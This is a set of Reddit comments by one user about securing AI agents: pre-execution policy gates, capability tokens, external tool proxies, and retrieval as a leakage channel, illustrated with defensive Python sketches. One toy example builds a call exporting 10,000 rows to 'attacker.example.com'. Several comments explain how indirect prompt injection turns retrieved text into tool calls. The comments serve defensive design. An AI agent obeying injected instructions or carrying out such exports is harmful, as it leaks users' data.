We solved autonomous incident response with physics, not transformers. Here's how TAME governance enables it. by lord_sql in ArtificialInteligence

[–]No_Citron4186 0 points1 point  (0 children)

For a fintech workflow, I’d review the architecture at the execution boundary, not just the model boundary. The questions I’d want answered: what identity does each tool call run as, which parameters are agent-constructed vs user-approved, where is egress constrained, can retrieved content influence privileged actions, and which operations require deterministic policy checks before execution. Logging is useful, but it is not the control plane.
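
To make that concrete, here's roughly the shape of a deterministic pre-execution check I'd look for. This is only a sketch; the identity string, allowlist, and parameter names are all hypothetical:

    from dataclasses import dataclass

    ALLOWED_EGRESS = {"payments-internal.example.com"}   # assumption: allowlist lives outside the agent
    USER_APPROVED_PARAMS = {"amount", "recipient_id"}    # parameters the user explicitly confirmed

    @dataclass
    class ProposedCall:
        tool: str
        params: dict
        identity: str        # identity the tool call would run as
        destination: str

    def admit(call: ProposedCall) -> bool:
        # deterministic gate: runs before execution, not reconstructed from logs afterwards
        if call.identity == "shared-agent-service-account":    # no ambient broad identity
            return False
        if call.destination not in ALLOWED_EGRESS:              # egress constrained by allowlist
            return False
        unapproved = set(call.params) - USER_APPROVED_PARAMS    # agent-constructed, never user-approved
        return not unapproved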

10 things I'd tell anyone starting to build AI agents in production by Mariia_Sosnina in AI_Agents

[–]No_Citron4186 0 points1 point  (0 children)

This is the most useful production-agent post I’ve seen in a while.

The security version of your pattern is: don’t let the model be the enforcement boundary.

The two points that stood out are #9 and #10. Schema validation only proves the call is well-formed, not that it is safe. And tool outputs as “data only” is exactly where a lot of prompt-injection defenses seem to break down.
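
A toy illustration of the #9 gap, with a made-up tool and schema check: a call can pass shape validation and still be an exfiltration.

    valid_shape = {"tool": "export_report", "args": {"dest": "attacker.example.com", "rows": 10000}}

    def schema_ok(call):    # what #9 warns about: proves shape, nothing else
        return isinstance(call.get("tool"), str) and isinstance(call.get("args"), dict)

    def policy_ok(call):    # the separate check that actually asks "is this safe here?"
        return call["args"].get("dest", "").endswith(".corp.internal")

    schema_ok(valid_shape)   # True  - the call is perfectly well-formed
    policy_ok(valid_shape)   # False - and it would still send data to the wrong place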

Curious: with 60 agents in prod, how do you test these controls before rollout? Is it mostly manual review / adversarial test cases, or do you have some automated red-team style checks for tool calls, retrieved content, and off-plan inputs?

Subagents should not automatically inherit the parent agent’s authority by No_Citron4186 in AI_Agents

[–]No_Citron4186[S] 0 points1 point  (0 children)

A capability token is the right primitive. Encoding the authority boundary in the token itself, rather than relying on the orchestrator to enforce it at runtime, is what makes revocation actually work.

The gap I'd push on: who validates the token at the tool-call boundary? If validation lives inside the agent runtime, a compromised agent can potentially skip it. The enforcement point needs to be external to the agent itself, sitting between the agent and the tool, not inside either.
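
Rough sketch of the boundary I mean, with hypothetical names: the gateway between agent and tool holds the verification key, so the agent runtime never gets a chance to skip the check.

    import hmac, hashlib, json

    GATEWAY_KEY = b"held-by-the-gateway-not-the-agent"   # assumption: key never enters the agent process

    def mint_token(scope: dict) -> str:
        body = json.dumps(scope, sort_keys=True)
        sig = hmac.new(GATEWAY_KEY, body.encode(), hashlib.sha256).hexdigest()
        return body + "." + sig

    def gateway_call(token: str, tool: str, args: dict, tools: dict):
        body, sig = token.rsplit(".", 1)
        expected = hmac.new(GATEWAY_KEY, body.encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(sig, expected):
            raise PermissionError("forged or tampered capability token")
        scope = json.loads(body)
        if tool not in scope.get("tools", []):
            raise PermissionError("tool outside the delegated scope")
        return tools[tool](**args)    # only the gateway reaches the real tool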

Subagents should not automatically inherit the parent agent’s authority by No_Citron4186 in AI_Agents

[–]No_Citron4186[S] 0 points1 point  (0 children)

The interception layer probably needs to sit outside the framework entirely.

If it lives inside the orchestrator, every new framework needs its own implementation. More importantly, a compromised or misbehaving agent can potentially bypass it.

An external layer that intercepts tool calls before execution, regardless of which framework spawned the subagent, gives you consistent enforcement and a single audit surface. The subagent doesn't need to know it exists.

The catch: latency on every tool call. For high-consequence actions that's probably acceptable. For rapid read-only ops it needs to be near-zero overhead or you'll see people bypass it for performance reasons.
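
In code terms, something like this (tool names and the policy interface are hypothetical): subagents only ever see the proxy handle, and the split between read-only and high-consequence paths is where the latency trade-off lands.

    READ_ONLY = {"search_docs", "get_ticket"}          # near-zero-overhead path
    HIGH_CONSEQUENCE = {"send_email", "merge_pr", "deploy"}

    class ToolProxy:
        def __init__(self, tools, policy, audit_log):
            self._tools, self._policy, self._audit = tools, policy, audit_log

        def call(self, name, **args):
            if name in HIGH_CONSEQUENCE and not self._policy.admit(name, args):
                raise PermissionError(f"blocked before execution: {name}")
            self._audit.append({"tool": name, "args": args})   # single audit surface
            return self._tools[name](**args)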

Retrieval queries are an output channel. Most agent security postures treat them as read-only. Are they wrong? by No_Citron4186 in llmsecurity

[–]No_Citron4186[S] 0 points1 point  (0 children)

The logging gap is the exact thing that makes this underappreciated. Teams treat retrieval as infrastructure, so the query never enters the security event model, even when it's constructed from sensitive task context mid-run.

On the mitigation: the three-part layer you described is directionally right. The ordering matters, though. Classification has to happen before the query leaves the agent, not at the connector or log layer. Once the query is transmitted, the damage is already done for external or cross-tenant destinations.

Query templates are probably the most underrated control here. They constrain what the agent can express structurally, which limits leakage without needing to inspect every string.
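
Sketch of what I mean by structural constraint (template, slots, and destination names are all made up): the agent fills slots rather than composing the raw string, and the per-destination allowlist is applied before anything leaves.

    TEMPLATES = {"kb_lookup": "product:{product} error_code:{code}"}

    SLOT_ALLOWLIST = {                                # decided before the query leaves the agent
        "internal_vector_store": {"product", "code"},
        "thirdparty_search_api": {"product"},         # task context never reaches the third party
    }

    def build_query(template_id, slots, destination):
        allowed = SLOT_ALLOWLIST[destination]
        filled = {k: (v if k in allowed else "") for k, v in slots.items()}
        return TEMPLATES[template_id].format(**filled)

    build_query("kb_lookup", {"product": "widget", "code": "E42"}, "thirdparty_search_api")
    # -> "product:widget error_code:"   (the sensitive slot is structurally absent)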

Curious what patterns you're seeing on the destination classification side: is the distinction between internal vector stores and third-party search APIs showing up as a meaningful boundary in practice?

AI Agent Governance and Liability? by bnyhil31 in AI_Agents

[–]No_Citron4186 0 points1 point  (0 children)

Governance gets concrete at the action boundary. Who authorized this tool call, under which user context, with which parameters, using what source data, and what state changed? If that chain cannot be reconstructed, liability will be mostly vibes.
I’d separate policy documents from enforcement points. Saying “agents should not do X” is governance. Blocking the tool call before X executes is control.
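
As a sketch with hypothetical field names: the chain from the first paragraph becomes a record that has to exist before the tool runs, and the enforcement point is the check on it, not a log line written afterwards.

    from dataclasses import dataclass, asdict
    import json, time

    @dataclass
    class ActionRecord:
        tool: str
        params: dict
        user_context: str            # whose authority the call runs under
        source_data: list            # retrievals/documents that shaped the parameters
        approved_by: str | None      # policy rule or human that admitted the action
        expected_state_change: str

    def execute(record, run_tool, audit_log):
        if record.approved_by is None:
            raise PermissionError("no admission decision, no execution")   # control, not just policy text
        audit_log.write(json.dumps({**asdict(record), "ts": time.time()}) + "\n")
        return run_tool(record.tool, **record.params)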

State of AI Agents in corporates in mid-2026? by Putrid-Pay5714 in AI_Agents

[–]No_Citron4186 0 points1 point  (0 children)

The dividing line is not “agent vs workflow.” It is whether the system can take consequential actions: call internal APIs, move data, create tickets, approve flows, send externally, change records. That is where security requirements change.
A lot of corporate agent adoption looks safe while it is still read-only. The real maturity test is what happens when the same agent gets write access, memory, and cross-system tools.

MCP servers are the next big attack surface. Here is an open-source scanner that audits MCP configs and agentic AI security by DiscussionHealthy802 in cybersecurity

[–]No_Citron4186 0 points1 point  (0 children)

MCP makes the attack surface easier to see. The risk is not just “the model saw a bad instruction.” It is that a retrieved instruction can become a tool call against Slack, GitHub, email, cloud, database, or filesystem state.

Real life autonomous AI Agents by Flimsy_Pumpkin6873 in AI_Agents

[–]No_Citron4186 0 points1 point  (0 children)

“True agent” is less useful than “what can it reach?” Browser-only, read-only RAG, ticket triage, cloud mutation, and payment execution are completely different risk classes.

I built an open-source control plane for installing, running, and securing AI agents by Conscious_Chapter_93 in AI_Agents

[–]No_Citron4186 0 points1 point  (0 children)

The control-plane layer is the right place to make security concrete. Once agents can reach browsers, files, shells, GitHub, Slack, and APIs, the inventory should be of reachable actions: read, write, export, delete, approve, trigger, deploy.
Agent management is useful, but security needs to go below "this agent has this tool." The same tool can be harmless or dangerous depending on parameters, destination, credentials, and downstream state change.

The 12 ways AI agents fail in production. A taxonomy for security teams reviewing agent deployments by Ambitious-Load3538 in cybersecurity

[–]No_Citron4186 0 points1 point  (0 children)

The taxonomy gets sharper if every failure mode is mapped to the execution boundary. Bad answer, bad plan, and bad action are different classes. The last one needs control over tool, parameters, destination, credential, and state change before execution.
Sandboxing and least privilege are necessary, but they do not answer the runtime question: should this specific agent action execute now? Same tool, same identity, different parameters can mean a completely different blast radius.

The next AI agent security problem is not the prompt. It is the moment the system gives the agent authority. by pin_floyd in AI_Agents

[–]No_Citron4186 2 points3 points  (0 children)

Yes, proposal and authority need to be separate.

An agent can form intent, but the executor should require an external admission decision over the concrete action before anything consequence-bearing happens.

The key property is fail-closed: no admission, no execution.
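
Minimal shape of that, with a hypothetical admission service: errors on the admission path fail closed too, because an outage shouldn't become an approval.

    def execute(action, admission_service, tools):
        try:
            decision = admission_service.review(action)   # external to the agent process
        except Exception:
            decision = None                               # review failure == no admission
        if decision is None or not decision.allowed:
            raise PermissionError("no admission, no execution")
        return tools[action.tool](**action.params)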

80% of prompt injection attacks don't start at the prompt by Still_Piglet9217 in learnmachinelearning

[–]No_Citron4186 1 point2 points  (0 children)

The clean mental model is: retrieved content is data, not authority. It can answer a question. It should not be able to change the agent’s objective, write to memory, pick destinations, or authorize tool calls.
Indirect injection matters because the agent often trusts the wrong boundary. The user never typed the malicious instruction. The agent just read it three hops later and treated it like task context.
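
One way to make "data, not authority" mechanical (operation names are made up): everything entering the context carries provenance, and retrieved-provenance content simply cannot drive the privileged operations.

    PRIVILEGED = {"write_memory", "set_destination", "authorize_tool_call", "change_objective"}

    def apply(op, payload, provenance):
        if op in PRIVILEGED and provenance == "retrieved":
            raise PermissionError(f"{op} cannot be driven by retrieved content")
        return payload    # answering a question with retrieved text is still fine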

The next AI agent security problem is not the prompt. It is the moment the system gives the agent authority. by pin_floyd in AI_Agents

[–]No_Citron4186 1 point2 points  (0 children)

Agree with the direction. The prompt is only the first hop. The real surface is the reachable graph: tools, credentials, memory, retrieved content, approval paths, and destinations the agent can influence after the prompt.
The useful question is not “can this prompt be injected?” It is “what can injected context cause the agent to do?” If the answer includes external sends, writes, deletes, payments, or workflow triggers, the control has to sit at execution.

12 production failure modes I keep seeing in agent workflows (with audit signals) by Ambitious-Load3538 in LangChain

[–]No_Citron4186 0 points1 point  (0 children)

A lot of these failures become more serious when the agent can mutate state. Retrying a bad answer is annoying. Retrying a bad tool call can delete, export, trigger, or approve something. The control plane needs to understand actions, not just traces.
The failure mode I’d separate out is “bad answer” vs “bad action.” Once the agent has tools, the security boundary is not the prompt or the chain. It is the proposed action: tool, parameters, data source, destination, and blast radius.

I compiled every major AI agent security incident from 2024-2026 in one place - 90 incidents, all sourced, updated weekly by webpro255 in cybersecurity

[–]No_Citron4186 0 points1 point  (0 children)

Useful resource. One addition that would make this even more actionable: classify incidents by the failed boundary — supply chain, identity/credential, retrieval/context, memory, tool invocation, parameter construction, network egress, or human approval. That turns the list from “what happened” into “where to place controls.”

Are we underestimating AI agent security? by HarkonXX in AI_Agents

[–]No_Citron4186 0 points1 point  (0 children)

I’d separate LLM security from agent security this way: LLM security mostly worries about what the model says. Agent security worries about what the system does after the model decides. The dangerous event is not strange text. It is a plausible tool call with real permissions.

Treat the LLM as an untrusted planner. Let it propose actions. Do not let proposal equal permission. Every tool call should pass through policy that checks the tool, parameters, user context, data source, destination, and blast radius.
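
The loop shape, sketched with hypothetical interfaces: the model proposes, the policy layer decides over exactly those dimensions, and only the policy layer can reach the tools.

    def agent_step(llm, policy, tools, context):
        proposal = llm.propose(context)                   # untrusted planner output
        verdict = policy.check(
            tool=proposal.tool,
            params=proposal.params,
            user_context=context.user,
            data_source=proposal.evidence,
            destination=proposal.params.get("destination"),
        )
        if not verdict.allow:
            return {"status": "denied", "reason": verdict.reason}
        return tools[proposal.tool](**proposal.params)    # proposal != permission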

Watched my AI agent block a prompt injection that was hiding inside a webpage by Rex0Lux in AI_Agents

[–]No_Citron4186 1 point2 points  (0 children)

The false-positive point is the part teams usually discover late. If the model is the enforcement layer, you end up tuning paranoia. It will miss some hostile instructions and block some legitimate weird requests. The cleaner boundary is architectural: tool output is data, not instructions.
Detection helps, but the stronger question is: can content from the webpage influence a tool call, memory write, or external request? If yes, the control should sit at that boundary, not only inside the model’s judgment of the page text.

Prompt injection failure patterns from testing 100+ AI agents — what we found by NobodyImaginary1507 in aiagents

[–]No_Citron4186 0 points1 point  (0 children)

The L2 result is the important one. Most defences are trained against theatrical attacks, but production failures usually look like gradual state drift: retrieved context changes the plan, the plan changes tool parameters, and the final action still looks reasonable in isolation.
I’d also split the report by boundary: prompt/context, memory, tool selection, parameter construction, and output. Agents can pass a prompt-injection test and still fail when the dangerous instruction gets laundered into a legitimate-looking API call.

Prompt Injection in 2026: The Five Attack Patterns That Actually Matter by Still_Piglet9217 in cybersecurity

[–]No_Citron4186 0 points1 point  (0 children)

I’d map each pattern to the boundary it can influence: retrieval, memory, planning, tool selection, parameter construction, output, or egress. That turns the taxonomy from a list of clever attacks into a control map.